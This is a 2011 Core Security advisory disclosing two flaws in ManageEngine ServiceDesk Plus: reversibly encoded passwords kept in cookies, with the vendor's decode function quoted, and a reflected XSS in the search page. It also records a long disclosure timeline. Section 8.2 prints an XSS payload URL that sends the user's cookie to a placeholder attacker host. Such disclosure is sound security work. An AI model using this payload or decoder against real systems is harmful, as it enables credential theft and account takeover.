Multiples Vulnerabilities in ManageEngine ServiceDesk Plus

1. Advisory Information

Advisory Id: CORE-2011-0506
Advisory URL: https://www.coresecurity.com/core-labs/advisories/multiples-vulnerabilities-manageengine-sdp
Date published: 2011-09-14
Date of last update: 2011-09-14
Vendors contacted: ManageEngine
Release mode: User release

2. Vulnerability Information

Class: Authentication issues [CWE-287], Cross site scripting [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1509, CVE-2011-1510

3. Vulnerability Description

ManageEngine ServiceDesk Plus is a complete web based and ITIL ready service desk software with integrated asset management developed by ManageEngine, the Enterprise IT Management Software division of Zoho Corporation [1].

The authentication process of ServiceDesk Plus obfuscates user passwords using a trivial and symmetrical algorithm in Javascript code with no secret. Given that user passwords are locally stored in user cookies and having the Javascript code to encrypt and decrypt passwords in a .js file , the authentication process of ServiceDesk Plus can be bypassed allowing an attacker to get usernames+passwords of registered users.

Additionally, a cross site scripting vulnerability related to search functions was found.

4. Vulnerable Packages

• ManageEngine ServiceDesk Plus 8.0.0 Professional edition.
• Older versions are probably affected too, but they were not checked.

5. Non-Vulnerable Packages

• Contact vendor for further information.

6. Vendor Information, Solutions and Workarounds

Regarding the vulnerability issue in SearchSolution page [CVE-2011-1510], the SDP team has identified this vulnerability [2011-05-16] and it was fixed in SDP 8012, June 2011. ManageEngine did not provide technical information, workaround nor a clear timeline for fixes regarding [CVE-2011-1509]. Please, contact vendor for further information and patches.

7. Credits

This vulnerability was discovered and researched by Matias Blanco from Core Security.

8. Technical Description / Proof of Concept Code

8.1. Authentication Weakness

[CVE-2011-1509] User passwords are pseudo encrypted and locally stored in user cookies. This encryption is symmetrical using Caesar Cipher with no salt or secret, having the Javascript code encrypt and decrypt passwords in Login.js file.

/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */ ... 12 13 function encryptPassword(textPassword) 14 { 15 var num_out = ""; 16 var str_in = escape(textPassword); 17 for(i = 0; i < str_in.length; i++) 18 { 19 num_out += str_in.charCodeAt(i) - 23; 20 } 21 return num_out; 22 } 23 

 

/* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */ ... 23 24 function decryptPassword(encPassword) 25 { 26 var str_out = ""; 27 var num_out = encPassword; 28 for(i = 0; i < num_out.length; i += 2) 29 { 30 num_in = parseInt(num_out.substr(i,[2])) + 23; 31 num_in = unescape('%' + num_in.toString(16));// No I18N 32 str_out += num_in; 33 } 34 var textPassword = unescape(str_out); 35 return textPassword ; 36 } 37 

 

So, if the attacker succeeded in trying to steal the cookie, he can easily decrypt it and get the original password. Given that the username is also stored in plaintext in the cookie, this can lead to impersonation and identity theft.

8.2. Cross-Site Scripting

[CVE-2011-1510] There is a lack of sanitization in the searchText parameter located in the SolutionSearch.do page. An external attacker can obtain the password of an authenticated ManageEngine user by making this request:

https://[vulnerable_site]/SolutionSearch.do?searchText=';var el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);'

This request performs an HTTP request to a webserver controlled by the attacker, http://[malicious_site], sending the cookie that includes the predictable password.

9. Report Timeline

• 2011-05-12: Initial notification to the vendor. Publication date set to June 7th, 2011.
• 2011-05-13: The Service Desk team asks Core for a technical description of the vulnerability.
• 2011-05-13: Technical details sent to Service Desk team.
• 2011-05-16: The Service Desk team notifies they are analyzing the [CVE-2011-1509] issue and it will take them some time to fix it. The issue [CVE-2011-1510] was identified and it will be fixed in SDP 8012, which is expected by the end of May 2011.
• 2011-05-23: Core requests to clarify whether the problems will be released altogether or in two release cycles.
• 2011-05-27: The Service Desk team notifies the issue [CVE-2011-1510] will be fixed in the upcoming hotfix 8012, which is currently under validation phase and is expected to get released by next week. Regarding the encryption issue [CVE-2011-1509], the Service Desk team notifies they will have to work on that and will not be able to provide a fix by June 7th 2011.
• 2011-06-02: Core states that neither the progress status nor the release date for the fix of [CVE-2011-1509] have been notified. Core also claims that the advisory publication was rescheduled to Jun 21st, and requests a clear timeline.
• 2011-06-07: The Service Desk team notifies that they have not been working on this issue. Once the next product release is over they will get started on the analysis.
• 2011-06-07: First release date missed.
• 2011-06-21: Second release date missed.
• 2011-06-23: Core notifies that the vulnerability was reported 5 weeks ago [2011-05-12], 2 release dates were already missed, and requests an update on the status as soon as possible in order to assess the situation.
• 2011-07-08: Core notifies that is not possible to keep the process coordinated without the requested information and reschedules the advisory to be published on July 19th as 'User Release'.
• 2011-07-08: The Service Desk team notifies that they have started analyzing [CVE-2011-1509] and working on various solutions to get this fixed. The vendor also notifies that they will try to roll the patches on the 8.1 release, which is expected in 2 months' time from now.
• 2011-07-18: Core considers bad practice to postpone the patch release 2 months until a new version of the product is available (since it may suffer engineering delays that have nothing to do with the reported security issue itself). As a result, Core offers to reschedule the advisory publication to Aug 9th, providing additional time to the vendor for developing patches and/or the appropriate mitigation actions, until the version 8.1 comes to light.
• 2011-07-19: Third release date missed.
• 2011-08-08: Core requests a status update and notifies the advisory is currently scheduled to be published tomorrow, Aug 9th. Core also requests to clarify if the vendor will release fixes for previous vulnerable versions of ManageEngine.
• 2011-08-09: Manage Engine team notifies they have not fixed the issue yet and customers will have to upgrade to the latest version to get a fixed version of the product.
• 2011-08-09: Fourth release date missed.
• 2011-08-12: Core notifies that the release date was missed and requests to clarify a new estimated date for disclosure. Core also requests additional technical information regarding the fix and how Manage Engine team is going to resolve the weakness in the authentication process. Core also requests to clarify if customers of old versions will have to pay for the latest (patched) version or they will be able to download free patches.
• 2011-08-16: Manage Engine team notifies that there could be a delay of about a month for a release candidate; technical details will be released once they decide on the final implementation. Vendor also notifies that the upgrade from a earlier version to a new version is free. A patch will be available in the site for the upgrades.
• 2011-08-18: Core notifies that given:
  1. this flaw was reported 3 months ago [2011-05-12],
  2. 4th release dates were already missed,
  3. SDP is postponing the release of patch until a new version of the product is available,
  4. and the lack of technical information about how and when SDP will patch this flaw;
  Core has decided to re-schedule the advisory to Sep 13th and this should be considered as a final date.
• 2011-09-14: CORE-2011-0506 is published.

10. References

[1] ManageEngine ServiceDesk Plus http://www.manageengine.com/products/service-desk.

11. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: https://www.coresecurity.com/core-labs.

12. About Core Security 

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. 

13. Disclaimer

The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team.